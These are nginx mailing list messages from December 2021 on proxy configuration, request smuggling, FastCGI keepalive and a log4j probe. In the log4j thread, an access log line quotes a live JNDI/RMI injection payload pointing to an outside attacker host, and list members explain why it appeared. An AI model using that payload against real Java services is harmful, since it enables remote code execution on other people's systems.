/pwm/public/resources/nonce-135vkyu/themes/pwm/style.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.013 0.016 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/mobileStyle.css HTTP/1.1" 200 1550 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/themes/pwm/mobileStyle.css HTTP/1.1" 200 1552 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.010 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/style-print.css HTTP/1.1" 200 1547 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.013 0.012 "2.63" Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293008#msg-293008 From francis at daoine.org Sat Dec 4 08:56:38 2021 From: francis at daoine.org (Francis Daly) Date: Sat, 4 Dec 2021 08:56:38 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> References: <20211203155939.GU12557@daoine.org> <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211204085638.GW12557@daoine.org> On Fri, Dec 03, 2021 at 12:57:06PM -0500, agomes wrote: Hi there, It looks like your /pwm/public/forgottenpassword page wants lots of content from /pwm/public/resources. I expect that you still do not want to publish /pwm/private/login. If you are happy to expose all of /pwm/public/, and you are happy for the users to see the /pwm/public/ urls in their browser, then it might be easier to proxy_pass /pwm/public/ to /pwm/public/, and to redirect the short "reset password" url that you want to advertise, to the longer one. That could be something like location = /app { return 301 /pwm/public/forgottenpassword; } location /pwm/public/ { proxy_pass https://myappp; } If you need "proxy_set_header Host $host;", then add it; you may not need a proxy_redirect depending on what the internal server actually returns. If you have other "location ~" parts in your nginx config, you should consider using "location ^~ /pwm/public/" for the second one instead. > Error > Password Self Service PWM > Error > > PWM 5025 > > > Maximum login attempts for this session have been exceeded. Try again > later. I suspect that that will be related to the cookie thing -- the login probably wants the confirmation cookie, but because the pwm service tells the browser to only return the cookie to requests below /pwm, and the browser is requesting /app, the browser is not sending the cookie. With the new suggested config, the browser will be requesting things below /pwm, and should send the cookie. If the /pwm application considers "session" to be "source IP", then when it is reverse-proxied, it will see all traffic from the one IP address,which might confuse it. > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /app/ HTTP/1.1" 200 104 "-" > "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like > Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" > 0.007 0.008 "0.88" That is: a request to /app/ got a small http 200 response. But then the next request is browser requesting /pwm, with a Referer of /app/ -- it might be interesting to see why that was. Maybe you need to publish more than just /pwm/public? (Actually: I suspect that in this case, the "/app/" request was direct to the internal server, which possibly is configured to return a javascript redirect to "/pwm" for anything unknown. So a better test, going direct to the internal server, would be too start with /pwm/public/forgottenpassword. But maybe it won't be needed, if the new suggested config Just Works.) > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm HTTP/1.1" 302 5 > "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.005 0.004 "-" "/pwm" redirected to "/pwm/". > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/ HTTP/1.1" 200 1430 > "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.011 0.008 "-" And "/pwm/" had lots of content below "/pwm/public/": > [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET > /pwm/public/resources/nonce-135vkyu/pwm-icons.css HTTP/1.1" 200 1549 > "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" > "x.x.x.x:8443" 0.005 0.004 "2.63" ... Hopefully that will get you closer to where you want to be. Good luck with it! f -- Francis Daly francis at daoine.org From i at qingly.me Sun Dec 5 15:24:38 2021 From: i at qingly.me (wordlesswind) Date: Sun, 5 Dec 2021 23:24:38 +0800 Subject: The certificate of quic.nginx.org has expired Message-ID: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> Hello, I noticed that the certificate of quic.nginx.org has expired. Best Regards, wordlesswind From gglater62 at gmail.com Mon Dec 6 09:01:22 2021 From: gglater62 at gmail.com (Witold Filipczyk) Date: Mon, 6 Dec 2021 10:01:22 +0100 Subject: Copy headers with internal redirect Message-ID: Hi, There is location ~ ^/blahblah/ { internal; } There is also Apache which set header X-Accel-Redirect. For example X-Accel-Redirect: /blahblah/1 but also set other headers. How in nginx copy all these headers to the client? Do you know such a module? Or how to write something like this? From pluknet at nginx.com Mon Dec 6 09:24:14 2021 From: pluknet at nginx.com (Sergey Kandaurov) Date: Mon, 6 Dec 2021 12:24:14 +0300 Subject: The certificate of quic.nginx.org has expired In-Reply-To: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> References: <24c887c2-f089-6e5b-6ea6-e44fa6ff3063@qingly.me> Message-ID: <4A37FA11-2881-4D5A-9368-F5D1578F3756@nginx.com> > On 5 Dec 2021, at 18:24, wordlesswind wrote: > > Hello, > > > I noticed that the certificate of quic.nginx.org has expired. > It should be fixed now. -- Sergey Kandaurov From ssoudri at cisco.com Fri Dec 10 11:46:48 2021 From: ssoudri at cisco.com (Sai Vishnu Soudri (ssoudri)) Date: Fri, 10 Dec 2021 11:46:48 +0000 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? Message-ID: Hi everyone, I'm a new NGINX user and I want to understand what NGINX reverse proxy users are doing to mitigate HTTP request smuggling vulnerability. I understand that NGINX does not support sending HTTP/2 requests upstream. Since the best way to prevent HTTP Request Smuggling is by sending HTTP/2 requests end to end. I believe NGINX when used as a reverse proxy could expose my backend server to HTTP request smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 before sending it upstream. Apart from the web application firewall (WAF) from NGINX App Protect, is there any other solution to tackle this vulnerability? I am relatively new to NGINX and reverse proxies, if NGINX or its users does have an alternate solution, please do share. Thank you. Regards, Sai Vishnu Soudri -------------- next part -------------- An HTML attachment was scrubbed... URL: From sscotti at sias.dev Sun Dec 12 05:27:07 2021 From: sscotti at sias.dev (Stephen D. Scotti, M.D.) Date: Sat, 11 Dec 2021 23:27:07 -0600 Subject: Question about rewrite in nginx.conf using a variable ? Message-ID: <002FD0DA-572A-402E-9322-A7B18F1CB29E@sias.dev> I have a configuration for a Docker NGINX container that works OK with my 'static' configuration, but I?d like to maybe use a variable in the proxy rewrite to avoid have to duplicate a location block for the server. A sample Static setup with some of the extra stuff removed is shown below. That actually 'works' when I explicitly specify /pacs-1/ and /pacs-2/. pacs-1 and pacs-2 happen to also be the name for other servers in my Docker Setup, so http://pacs-1:8042 resolves to the docker container since it is called from Docker. Those servers are not accessible outside of the container, which is one reason why I proxy some requests made to it from outside of the container. I?m curious if it is possible to rewrite that such that I can match one of several container name from the request URI, e.g. something like location ~ ^/(pacs-butterfly|pacs-1|pacs-2)(/.*) I tried various options, including setting a variable and nothing seems to work yet. I could just create a separate block for each server, but it would be nice to generalize it so it would always work as long as the request uri corresponds to an existing container. Thanks. . location /pacs-1/ { if ($request_method = 'OPTIONS') { return 204; } auth_request /auth; auth_request_set $auth_status $upstream_status; proxy_buffering off; rewrite /pacs-1/(.*) /$1 break; proxy_pass http://pacs-1:8042 ; proxy_redirect http://pacs-1:8042/ /; proxy_set_header HOST $host; } location /pacs-2/ { if ($request_method = 'OPTIONS') { return 204; } auth_request /auth; auth_request_set $auth_status $upstream_status; proxy_buffering off; rewrite /pacs-2/(.*) /$1 break; proxy_pass http://pacs-2:8042 ; proxy_redirect http://pacs-2:8042/ /; proxy_set_header HOST $host; } Stephen D. Scotti -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 3887 bytes Desc: not available URL: From mdounin at mdounin.ru Mon Dec 13 22:18:21 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 14 Dec 2021 01:18:21 +0300 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: References: Message-ID: Hello! On Fri, Dec 10, 2021 at 11:46:48AM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Hi everyone, > > I'm a new NGINX user and I want to understand what NGINX reverse > proxy users are doing to mitigate HTTP request smuggling > vulnerability. I understand that NGINX does not support sending > HTTP/2 requests upstream. > > Since the best way to prevent HTTP Request Smuggling is by > sending HTTP/2 requests end to end. I believe NGINX when used as > a reverse proxy could expose my backend server to HTTP request > smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 > before sending it upstream. > > Apart from the web application firewall (WAF) from NGINX App > Protect, is there any other solution to tackle this > vulnerability? I am relatively new to NGINX and reverse proxies, > if NGINX or its users does have an alternate solution, please do > share. There are no know vulnerabilities in nginx which make request smuggling possible. In particular, HTTP/2 code properly rejects things like ":" or newlines in headers and checks the request body length from the very start. Further, various mitigations introduced in nginx 1.21.x are believed to stop most, if not all, known attacks even assuming various known vulnerabilities of a server in front of nginx and/or behind nginx. Probably the only thing to care about are inherently insecure settings like "ignore_invalid_headers off;"[1] and "underscores_in_headers on;"[2]. These are better to be kept in their default values unless you understand possible implications in your particular setup. [1] http://nginx.org/r/ignore_invalid_headers [2] http://nginx.org/r/underscores_in_headers -- Maxim Dounin http://mdounin.ru/ From ssoudri at cisco.com Tue Dec 14 14:50:19 2021 From: ssoudri at cisco.com (Sai Vishnu Soudri (ssoudri)) Date: Tue, 14 Dec 2021 14:50:19 +0000 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: References: Message-ID: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> Hi Maxim, Thanks a lot for your reply. Just to clarify, by "There are no know vulnerabilities in nginx which make request smuggling possible" you mean after the 1.21.x release right? I am using OpenResty and the latest version of OpenResty is based on mainline nginx core 1.19.9. Currently, the approach I'm taking to mitigate HTTP Request Smuggling is blocking all incoming HTTP/1.1 requests. I was worried if incoming HTTP/2 requests would pose a vulnerability as nginx converts it before sending upstream, but with your reply I believe that should not be a problem anymore. Since OpenResty is not able to leverage the new changes added in 1.21.x, do you suggest I continue with this approach till OpenResty can leverage the changes made in 1.21.x or is it mandatory to use 1.21.x and block HTTP/1.1 requests to prevent request smuggling. Thank you, Sai Vishnu Soudri ?On 14/12/21, 3:48 AM, "nginx on behalf of Maxim Dounin" wrote: Hello! On Fri, Dec 10, 2021 at 11:46:48AM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Hi everyone, > > I'm a new NGINX user and I want to understand what NGINX reverse > proxy users are doing to mitigate HTTP request smuggling > vulnerability. I understand that NGINX does not support sending > HTTP/2 requests upstream. > > Since the best way to prevent HTTP Request Smuggling is by > sending HTTP/2 requests end to end. I believe NGINX when used as > a reverse proxy could expose my backend server to HTTP request > smuggling when it converts incoming HTTP/2 requests to HTTP/1.1 > before sending it upstream. > > Apart from the web application firewall (WAF) from NGINX App > Protect, is there any other solution to tackle this > vulnerability? I am relatively new to NGINX and reverse proxies, > if NGINX or its users does have an alternate solution, please do > share. There are no know vulnerabilities in nginx which make request smuggling possible. In particular, HTTP/2 code properly rejects things like ":" or newlines in headers and checks the request body length from the very start. Further, various mitigations introduced in nginx 1.21.x are believed to stop most, if not all, known attacks even assuming various known vulnerabilities of a server in front of nginx and/or behind nginx. Probably the only thing to care about are inherently insecure settings like "ignore_invalid_headers off;"[1] and "underscores_in_headers on;"[2]. These are better to be kept in their default values unless you understand possible implications in your particular setup. [1] http://nginx.org/r/ignore_invalid_headers [2] http://nginx.org/r/underscores_in_headers -- Maxim Dounin http://mdounin.ru/ _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From mdounin at mdounin.ru Tue Dec 14 22:16:51 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 15 Dec 2021 01:16:51 +0300 Subject: What are NGINX reverse proxy users doing to prevent HTTP Request smuggling? In-Reply-To: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> References: <6427103F-FFBD-4CF4-BB9A-8E9AC14A13F5@cisco.com> Message-ID: Hello! On Tue, Dec 14, 2021 at 02:50:19PM +0000, Sai Vishnu Soudri (ssoudri) wrote: > Thanks a lot for your reply. Just to clarify, by "There are no > know vulnerabilities in nginx which make request smuggling > possible" you mean after the 1.21.x release right? > I am using OpenResty and the latest version of OpenResty is > based on mainline nginx core 1.19.9. Supported releases are 1.20.2 stable and 1.21.4 mainline, see http://nginx.org/en/download.html. Though 1.19.9 isn't much different. > Currently, the approach I'm taking to mitigate HTTP Request > Smuggling is blocking all incoming HTTP/1.1 requests. I was > worried if incoming HTTP/2 requests would pose a vulnerability > as nginx converts it before sending upstream, but with your > reply I believe that should not be a problem anymore. > > Since OpenResty is not able to leverage the new changes added in > 1.21.x, do you suggest I continue with this approach till > OpenResty can leverage the changes made in 1.21.x or is it > mandatory to use 1.21.x and block HTTP/1.1 requests to prevent > request smuggling. I don't think you need to do anything special to prevent request smuggling unless you are using a buggy server in front of nginx. -- Maxim Dounin http://mdounin.ru/ From nginx-forum at forum.nginx.org Wed Dec 15 04:09:15 2021 From: nginx-forum at forum.nginx.org (eboats) Date: Tue, 14 Dec 2021 23:09:15 -0500 Subject: Multipart/form-data proxy pass? Message-ID: Hello, I'm using nginx as a proxy to a backend API that takes a POST payload of a csv file ( content type = multipart/form-data ). I can see the request getting to the API but the file is not being passed by nginx. What nginx config params do I need for nginx to pass the multipart/form-data to the backend API? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293076,293076#msg-293076 From osa at freebsd.org.ru Wed Dec 15 04:14:50 2021 From: osa at freebsd.org.ru (Sergey A. Osokin) Date: Wed, 15 Dec 2021 07:14:50 +0300 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: Hi, On Tue, Dec 14, 2021 at 11:09:15PM -0500, eboats wrote: > Hello, > I'm using nginx as a proxy to a backend API that takes a POST payload > of a csv file ( content type = multipart/form-data ). I can see the request > getting to the API but the file is not being passed by nginx. > > What nginx config params do I need for nginx to pass the multipart/form-data > to the backend API? Is there any error messages in the NGINX's error.log file? -- Sergey Osokin From nginx-forum at forum.nginx.org Wed Dec 15 04:28:02 2021 From: nginx-forum at forum.nginx.org (eboats) Date: Tue, 14 Dec 2021 23:28:02 -0500 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: I don't see any errors in the logs - the request gets to the backend API ok but am wondering what nginx config params may be involved in handling content_type= multipart/form-data. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293076,293078#msg-293078 From francis at daoine.org Wed Dec 15 09:09:39 2021 From: francis at daoine.org (Francis Daly) Date: Wed, 15 Dec 2021 09:09:39 +0000 Subject: Multipart/form-data proxy pass? In-Reply-To: References: Message-ID: <20211215090939.GY12557@daoine.org> On Tue, Dec 14, 2021 at 11:28:02PM -0500, eboats wrote: Hi there, > I don't see any errors in the logs - the request gets to the backend API ok > but am wondering what nginx config params may be involved in handling > content_type= multipart/form-data. As far as nginx is concerned, I'm pretty sure that "proxy_pass" is enough. Can you show a small nginx config that does not handle your request in the way that you want it to be handled? f -- Francis Daly francis at daoine.org From 877509395 at qq.com Sat Dec 18 05:37:11 2021 From: 877509395 at qq.com (=?ISO-8859-1?B?aHVpbWluZw==?=) Date: Sat, 18 Dec 2021 13:37:11 +0800 Subject: bandwidth limit for specific server Message-ID: Hi,       Is it possible to limit total bandwidth for server?   http {     include       mime.types;     default_type  application/octet-stream;     #access_log  /usr/local/nginx/logs/access.log  main;     access_log  off;     sendfile        on;     #tcp_nopush     on;     #keepalive_timeout  0;     keepalive_timeout  1;     client_max_body_size 50m;     gzip  on;     server_tokens off;     server {         listen       443 ssl;         server_name  x.x.x.x.x;         is it possible to limit total bandwidth for this server to for example 5M ? not to limit TCP connection bandwidth. need total bandwidth.         location / {         }         error_page 404 /404.html;             location = /40x.html {         }         error_page 500 502 503 504 /50x.html;             location = /50x.html {         }     }     include /usr/local/nginx/clientcfg/*.conf; } thanks in advance. huiming -------------- next part -------------- An HTML attachment was scrubbed... URL: From Nicolas.Franck at UGent.be Sun Dec 19 19:56:51 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Sun, 19 Dec 2021 19:56:51 +0000 Subject: keepalive connection to fastcgi backend hangs Message-ID: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> I've created a server setup where nginx acts as a proxy server for a fastcgi application. That last application is running on a different server on port 9000. It is spawn with spawn-fcgi. Recently I have found out that nginx closes the connection after every request. In order to make nginx keep the tcp connections alive, I've added the following settings: * proxy_socket_keepalive on * proxy_http_version 1.1; * proxy_set_header Connection ""; * fastcgi_keep_conn on; * added an upstream "fgi": upstream fcgi { keepalive 10; server myhost:9000; } * added a location block (only snippet given): location /fcgi { fastcgi_pass_request_headers on; fastcgi_pass fcgi; fastcgi_keep_conn on; } What I see: after a couple of requests nginx "hangs" when I visit path "/fcgi". This disappears when * I remove the setting "keepalive" from the upstream (but that disables keepalive altogether) * bind the fcgi application to a unix socket, and let nginx bind to that. But that requires nginx and the fcgi to be on the same server. * reduce the number of nginx workers to exactly 1. Not sure why that works. * I spawn the application with tool "supervisord" (a fcgi process manager written in python) Does anyone know what is happening here? Fcgi has little documentation on the web.. Example of an application: fcgi_example.cpp #include #include #include void handle_request(FCGX_Request& request){ fcgi_streambuf cout_fcgi_streambuf(request.out); std::ostream os{&cout_fcgi_streambuf}; os << "HTTP/1.1 200 OK\r\n" << "Content-type: text/plain\r\n\r\n" << "Hello!\r\n"; } int main(){ FCGX_Request request; FCGX_Init(); FCGX_InitRequest(&request, 0, 0); while (FCGX_Accept_r(&request) == 0) { handle_request(request); } } Build: g++ -std=c++11 -lfcgi -lfcgi++ -o fcgi_example fcgi_example.cpp Spawn: spawn-fcgi -f /path/to/fcgi_example.cpp -p 9000 -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at lazygranch.com Mon Dec 20 04:02:08 2021 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sun, 19 Dec 2021 20:02:08 -0800 Subject: 200 html return to log4j exploit Message-ID: <20211219200208.691f776b.lists@lazygranch.com> I don't have any service using java so I don't believe I am subject to this exploit. Howerver I am confused why a returned a 200 for this request. The special characters in the URL are confusing. 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" log_format main '$status $remote_addr - $remote_user [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; That is my log format from the nginx.conf. I now have a map to catch "jndi" in both url and agent. So far so good not that it matters much. I just like to gather IP addresses from hackers and block their host if it lacks eyeballs, From francis at daoine.org Mon Dec 20 09:19:36 2021 From: francis at daoine.org (Francis Daly) Date: Mon, 20 Dec 2021 09:19:36 +0000 Subject: 200 html return to log4j exploit In-Reply-To: <20211219200208.691f776b.lists@lazygranch.com> References: <20211219200208.691f776b.lists@lazygranch.com> Message-ID: <20211220091936.GZ12557@daoine.org> On Sun, Dec 19, 2021 at 08:02:08PM -0800, lists at lazygranch.com wrote: Hi there, > I don't have any service using java so I don't believe I am subject to > this exploit. Howerver I am confused why a returned a 200 for this > request. The special characters in the URL are confusing. > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" The request was "GET / HTTP/1.1". A 200 return for that is quite normal. > log_format main '$status $remote_addr - $remote_user > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > '"$http_user_agent" "$http_x_forwarded_for"'; The "please be exploited" parts are in the $http_referer and $http_user_agent parts of your log line. (And so, are presumably in the matching request headers.) Cheers, f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Mon Dec 20 14:11:49 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Dec 2021 17:11:49 +0300 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> Message-ID: Hello! On Sun, Dec 19, 2021 at 07:56:51PM +0000, Nicolas Franck wrote: > In order to make nginx keep the tcp connections alive, > I've added the following settings: > > * proxy_socket_keepalive on > * proxy_http_version 1.1; > * proxy_set_header Connection ""; Just a side note: you don't need any of these to keep FastCGI connections alive. > * fastcgi_keep_conn on; > * added an upstream "fgi": > > upstream fcgi { > keepalive 10; > server myhost:9000; > } > > * added a location block (only snippet given): > > location /fcgi { > fastcgi_pass_request_headers on; > fastcgi_pass fcgi; > fastcgi_keep_conn on; > } > > What I see: after a couple of requests nginx "hangs" when I > visit path "/fcgi". > > This disappears when > > * I remove the setting "keepalive" from the upstream (but that > disables keepalive altogether) > * bind the fcgi application to a unix socket, and let nginx bind > to that. But that requires nginx and the fcgi to be on the same > server. > * reduce the number of nginx workers to exactly 1. Not sure why > that works. > * I spawn the application with tool "supervisord" (a fcgi > process manager written in python) > > Does anyone know what is happening here? > Fcgi has little documentation on the web.. [...] > Spawn: spawn-fcgi -f /path/to/fcgi_example.cpp -p 9000 The spawn-fcgi defaults to 1 child process, and each child process can handle just one connection. On the other hand, your configuration instruct nginx to cache up to 10 connections per nginx process. As long as the only one connection your upstream server can handle is cached in another nginx process, nginx won't be able able to reach the upstream server, and will return 504 Gateway Timeout error once the fastcgi_connect_timeout expires (60s by default). Likely this is something you see as "hangs". Obvious fix would be to add additional fastcgi processes. Given "keepalive 10;" in nginx configuration, you'll need at least 10 * . Something like: spawn-fcgi -F 20 -f /path/to/fcgi -p 9000 should fix things for up to 2 nginx worker processes. Just in case, that's exactly the problem upstream keepalive documentation warns about (http://nginx.org/r/keepalive): "The connections parameter should be set to a number small enough to let upstream servers process new incoming connections as well". -- Maxim Dounin http://mdounin.ru/ From Nicolas.Franck at UGent.be Mon Dec 20 16:00:59 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Mon, 20 Dec 2021 16:00:59 +0000 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> Message-ID: <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Interesting! I looks like there is nothing that managing the incoming connections for the fcgi workers. Every fcgi worker needs to do this on its own, right? So if there are more clients (i.e. nginx workers) than fcgi workers, then it becomes unresponsive after a few requests, because all the fcgi workers are holding on to a connection to an nginx worker, and there seems to be no queue handling this. Is this correct? Just guessing here > On 20 Dec 2021, at 15:11, Maxim Dounin wrote: > > Hello! > > On Sun, Dec 19, 2021 at 07:56:51PM +0000, Nicolas Franck wrote: > >> In order to make nginx keep the tcp connections alive, >> I've added the following settings: >> >> * proxy_socket_keepalive on >> * proxy_http_version 1.1; >> * proxy_set_header Connection ""; > > Just a side note: you don't need any of these to keep FastCGI > connections alive. > >> * fastcgi_keep_conn on; >> * added an upstream "fgi": >> >> upstream fcgi { >> keepalive 10; >> server myhost:9000; >> } >> >> * added a location block (only snippet given): >> >> location /fcgi { >> fastcgi_pass_request_headers on; >> fastcgi_pass fcgi; >> fastcgi_keep_conn on; >> } >> >> What I see: after a couple of requests nginx "hangs" when I >> visit path "/fcgi". >> >> This disappears when >> >> * I remove the setting "keepalive" from the upstream (but that >> disables keepalive altogether) >> * bind the fcgi application to a unix socket, and let nginx bind >> to that. But that requires nginx and the fcgi to be on the same >> server. >> * reduce the number of nginx workers to exactly 1. Not sure why >> that works. >> * I spawn the application with tool "supervisord" (a fcgi >> process manager written in python) >> >> Does anyone know what is happening here? >> Fcgi has little documentation on the web.. > > [...] > >> Spawn: spawn-fcgi -f /path/to/fcgi_example.cpp -p 9000 > > The spawn-fcgi defaults to 1 child process, and each child process > can handle just one connection. On the other hand, your > configuration instruct nginx to cache up to 10 connections per > nginx process. > > As long as the only one connection your upstream server can handle > is cached in another nginx process, nginx won't be able able to > reach the upstream server, and will return 504 Gateway Timeout > error once the fastcgi_connect_timeout expires (60s by default). > Likely this is something you see as "hangs". > > Obvious fix would be to add additional fastcgi processes. Given > "keepalive 10;" in nginx configuration, you'll need at least 10 * > . Something like: > > spawn-fcgi -F 20 -f /path/to/fcgi -p 9000 > > should fix things for up to 2 nginx worker processes. > > Just in case, that's exactly the problem upstream keepalive > documentation warns about (https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fnginx.org%2Fr%2Fkeepalive&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=mHb200pbVMC0oS0HrbLY31hX3QyLQV0WQLoyt%2Fh96eM%3D&reserved=0): "The > connections parameter should be set to a number small enough to > let upstream servers process new incoming connections as well". > > -- > Maxim Dounin > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmdounin.ru%2F&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=vgJOdIzYbvba1kqXCKAiMY%2FPyNx3RgyQonp9cbLXZ6Q%3D&reserved=0 > _______________________________________________ > nginx mailing list > nginx at nginx.org > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Ce982b61a75624979ba3708d9c3c2b12b%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756063709619074%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=qNyDaV%2B0p4cuTlcFkBZeKN3gCT0A03xIMrb5qOOeBFk%3D&reserved=0 From jay at gooby.org Mon Dec 20 17:49:48 2021 From: jay at gooby.org (Jay Caines-Gooby) Date: Mon, 20 Dec 2021 17:49:48 +0000 Subject: 200 html return to log4j exploit In-Reply-To: <20211219200208.691f776b.lists@lazygranch.com> References: <20211219200208.691f776b.lists@lazygranch.com> Message-ID: The request is for your index page "GET / HTTP/1.1"; that's why your server responded with 200 OK. The special characters are in the referer and user-agent fields, as a log4j system would also try to interpolate these, and thus be vulnerable to the exploit. On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com wrote: > I don't have any service using java so I don't believe I am subject to > this exploit. Howerver I am confused why a returned a 200 for this > request. The special characters in the URL are confusing. > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" > > log_format main '$status $remote_addr - $remote_user > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > '"$http_user_agent" "$http_x_forwarded_for"'; > > That is my log format from the nginx.conf. > > I now have a map to catch "jndi" in both url and agent. So far so good > not that it matters much. I just like to gather IP addresses from > hackers and block their host if it lacks eyeballs, > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Jay Caines-Gooby http://jay.gooby.org jay at gooby.org +44 (0)7956 182625 twitter, skype & aim: jaygooby gtalk: jaygooby at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From lists at lazygranch.com Mon Dec 20 19:08:25 2021 From: lists at lazygranch.com (lists at lazygranch.com) Date: Mon, 20 Dec 2021 11:08:25 -0800 Subject: 200 html return to log4j exploit In-Reply-To: References: 